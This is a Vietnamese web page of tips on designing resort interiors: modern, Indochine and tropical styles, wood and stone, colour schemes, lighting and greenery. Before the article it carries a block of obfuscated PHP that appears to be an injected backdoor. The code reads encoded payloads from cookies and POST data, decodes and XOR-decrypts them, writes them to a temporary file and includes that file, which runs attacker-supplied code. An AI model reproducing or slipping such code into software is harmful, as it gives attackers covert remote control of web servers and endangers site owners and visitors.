$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Kinh nghiệm thiết kế nội thất resort tạo ra doanh thu khủng
Image Alt

Kinh nghiệm thiết kế nội thất resort tạo ra doanh thu khủng

Thiết kế hệ thống ánh sáng trong resort cận biển

Kinh nghiệm thiết kế nội thất resort tạo ra doanh thu khủng

Thiết kế nội thất resort đang là chủ đề được nhiều người quan tâm. Mặc dù chịu ảnh hưởng bởi bệnh dịch Covid nhưng ngành dịch vụ du lịch vẫn là sự lựa chọn xứng đáng để đầu tư.

Thị hiếu của du khách ngày một thay đổi và không ngừng cấp tiến. Vì thế mà không gian nội thất Resort cũng cần được đầu tư, chăm chút kỹ lưỡng. Đó không chỉ đơn giản là một loại hình lưu trú cho du khách mà còn là đẳng cấp và phong cách sống của người dùng.

Định hướng thiết kế nội thất resort cao cấp:

Mang lại những trải nghiệm tuyệt vời

Thiết kế nội thất resort mang lại trải nghiệm thú vị

Trải nghiệm độc đáo góp phần tạo nên dấu ấn của resort

Những trải nghiệm thú vị là điều không thể thiếu làm nên sự thành công của một resort. Bạn hãy khai thác các thế mạnh về địa lý, văn hóa của vùng để sáng tạo nên không gian và các loại hình dịch vụ đặc trưng cho doanh nghiệp.

Tạo không gian thư giãn thoải mái

Đối tượng khách hàng lựa chọn đến resort đều có nhu cầu nghỉ dưỡng cao. Vì thế việc tạo ra một không gian thư giãn thoải mái là vô cùng cần thiết. Không chỉ là không gian mà bầu không khí hay vị trí địa lý cũng rất quan trọng.

Thiết kế nội thất resort hòa mình với thiên nhiên

Không gian nghỉ dưỡng nhẹ nhàng cho khách hàng

Thiết kế nội thất resort cần chú trọng đến hệ thống sắp đặt ánh sáng và cửa sổ. Hệ thống thông gió cũng góp phần mang đến bầu không khí trong lành cho khách hàng. KTS cần dung hòa và cân bằng tốt các yếu tố thiên nhiên

Yếu tố tự nhiên và không gian xanh

Cuộc sống nơi phố thị quá ngột ngạt khiến cho con người tìm đến những vẻ đẹp hoang sơ. Mang các yếu tố thiên nhiên vào không gian sống đã trở thành một xu hướng được ưa chuộng không chỉ trong các resort cao cấp.

Thiết kế nội thất resort với hồ bơi và ghế phơi nắng

Du lịch nghỉ dưỡng hướng đến việc tạo nên không gian xanh

Việc tạo nên một hệ sinh thái thực vật phong phú trong chính không gian nghỉ dưỡng là một ý tưởng thú vị. Đặc biệt là trong những kỳ nghỉ dưỡng dài ngày. Khách hàng có thể trải nghiệm các hoạt động lành mạnh và hít thở bầu không khí trong lành.

Tiện ích, tiện nghi cao cấp và hiện đại

Thiết kế nội thất resort có nhà hàng sang trọng

Nội thất tiện nghi, sang trọng trong nhà hàng của resort 5 sao

Resort là hệ thống khách sạn nghỉ dưỡng cao cấp được bố trí theo các cấp bậc. Resort từ 1 sao đến 5 sao sẽ được đánh giá dựa trên độ tiện nghi của cơ sở vật chất và các yếu tố khác. Trong số đó, không gian nội thất là một trong những điểm quan trọng góp phần quyết định đến chất lượng của resort.

Kết nối với đặc thù địa phương

Kiến trúc và nội thất resort mang đậm dấu ấn văn hóa

Nét đẹp văn hóa được truyền tải vào trong công trình

Mỗi không gian nội thất đều mang một chủ đề mà chủ đầu tư muốn truyền tải. Các mẫu thiết kế nội thất resort cũng vậy. Hãy xác định nét đẹp văn hóa vùng miền mà bạn muốn truyền tải vào trong không gian. Từ đó khai thác các thế mạnh về chất liệu hay màu sắc để mang lại ấn tượng cho khách hàng.

Thiết kế nội thất resort hiện đại ấn tượng:

Thiết kế nội thất resort với vẻ ngoài hiện đại ấn tượng

Kiến trúc và nội thất hiện đại trong mẫu thiết kế resort nghỉ dưỡng


Thiết kế nội thất resort hiện đại độc đáo

Không gian nội thất ấn tượng bên trong khu vực tiếp khách của resort

Các thiết kế nội thất resort hiện đại thường hướng đến sự đẳng cấp và sang trọng. Bên cạnh đó, chúng còn thể hiện phong thái chuyên nghiệp và gu thẩm mỹ của công trình. Nội thất resort hiện đại ưu tiên những đường nét đơn giản và thiết kế thông minh.

Thiết kế nội thất resort Indochine cổ kính và mộc mạc:

Thiết kế nội thất resort phong cách Đông dương cổ kính

Không gian phòng ngủ view biển trong thiết kế resort Indochine


Thiết kế nội thất resort với không gian xanh thoáng đãng

Kiến trúc Indochine mang đậm tính truyền thống văn hóa Việt

Phong cách nội thất Indochine được ứng dụng nhiều trong các resort tại Việt Nam. KTS sẽ tạo nên một không gian mô phỏng làm quê Việt với những cách tân độc đáo. Vẻ đẹp sang trọng, mang đậm dấu ấn văn hóa lịch sử chính là dấu ấn đặc sắc trong không gian nội thất này.

Thiết kế nội thất resort mang hơi hướng Tropical:

Thiết kế nội thất resort phong cách tropical nhiều màu sắc

Bảng màu sống động trong không gian nội thất Tropical


Thiết kế nội thất resort theo loại hình nghỉ dưỡng

Không gian thư giãn nhẹ nhàng và yên tĩnh

Bầu không khí là điểm nổi bật trong không gian nội thất Tropical. Các thiết kế nội thất resort mang phong cách này vô cùng chú trọng đến yếu tố tự nhiên. Các loại chất liệu được sử dụng chủ yếu là gỗ hay tre nứa, rơm rạ.

Click “thiết kế nội thất du thuyền” Xem Ngay Thiết kế nội thất du thuyền đẳng cấp mang đậm phong vị xa xỉ

Gợi ý thiết kế nội thất resort đẹp và ấn tượng:

Điểm nhấn độc đáo với chất liệu gỗ và đá:

Không gian phòng ăn bằng chất liệu gỗ

Chất liệu gỗ là món quà quý giá mà mẹ thiên nhiên ban tặng

Gỗ là chất liệu vàng trong thiết kế nội thất và điều đó cũng không ngoại lệ với thiết kế nội thất resort. Tùy theo quá trình gia công và yêu cầu của người dùng mà chất liệu gỗ sẽ mang một vẻ đẹp khác nhau. Từ bề mặt thô mộc đến láng mịn cao cấp. Các lớp phủ dày dặn đến màu sắc nguyên bản. Chúng mang đến cảm giác ấm cúng, vững chắc và gần gũi cho người nhìn.

Bên cạnh gỗ thì chất liệu đá tự nhiên cũng là sự lựa chọn mang tính thẩm mỹ cao. Chúng được thiên nhiên ban tặng loạt vân đá tinh xảo và nghệ thuật. Việc sử dụng đá cẩm thạch bên trong không gian nội thất thể hiện vẻ đẹp cao cấp và mạnh mẽ.

Sự nhất quán trong cách lựa chọn màu sắc

Bảng màu rực rỡ trong không gian nội thất căn hộ

Bảng màu ấn tượng và hài hòa trong không gian nội thất

Màu đơn sắc: Các màu nhẹ nhàng phối hợp với gam màu đen hoặc trắng để tăng giảm sắc độ. Thích hợp sử dụng trong các thiết kế nội thất resort phong cách hiện đại.

Màu tương tự: Sử dụng các màu sắc nằm cạnh nhau trên bảng màu để tạo nên hài hòa trong không gian.

Màu tương phản: Cách kết hợp những màu sắc tương phản để gia tăng sự ấn tượng.

Màu sắc bổ sung: Tạo thêm sự sống động trong không gian bằng các gam màu đối lập nhau trong bảng màu.

Khéo léo trong cách tận dụng ánh sáng

Thiết kế hệ thống ánh sáng trong resort cận biển

Hệ thống ánh sáng mang đến bầu không khí lãng mạn khi màn đêm buông xuống

Nguồn sáng tự nhiên hay hệ thống đèn chiếu sáng đều rất quan trọng đối với không gian. Chúng giúp tạo ra được bầu không khí, cải thiện tâm trạng và mang đến cảm giác thoải mái nhà đẹp phú quốc. Chất liệu kính kết hợp hài hòa với ánh sáng sẽ mang lại vẻ đẹp sang trọng và ấm cúng.

Nguồn sáng tự nhiên có thể đến từ cửa sổ, hệ thống thông gió hay giếng trời.

Đèn chiếu sáng trong không gian nội thất có thể kể đến gồm đèn trần, đèn ngủ, hệ thống chiếu sáng âm tường,..

Trang trí không gian với các yếu tố tự nhiên:

Chất liệu gỗ và đá trong thiết kế resort

Sáng tạo không gian từ thiên nhiên hoang dã

Sử dụng cây xanh vào trong không gian sống ngoài tác dụng gia tăng tính thẩm mỹ còn giúp điều hòa không khí. Có thể nói, hệ sinh thái thực vật là một yếu tố không thể thiếu trong các thiết kế nội thất resort.

Các KTS có thể sáng tạo độc đáo trong cách bố trí và thiết kế cây xanh để đưa thiên nhiên gần gũi hơn với con người. Hồ nước nhân tạo, tường đá hay gốc cây cổ thụ cũng là những chi tiết trang trí vô cùng ấn tượng.

Hy vọng rằng bài viết trên đã chia sẻ cho bạn kinh nghiệm hữu ích khi thiết kế nội thất resort. Hãy luôn nắm bắt xu hướng và thị hiếu khách hàng để không ngừng thay đổi và cải thiện. Chỉ cần tinh tế một chút trong cách tạo dựng không gian, bạn sẽ để lại ấn tượng vô cùng khác biệt đối với khách hàng.

Click “thiết kế nội thất khách sạn” Xem Ngay Tổng hợp những điều cần biết về thiết kế nội thất khách sạn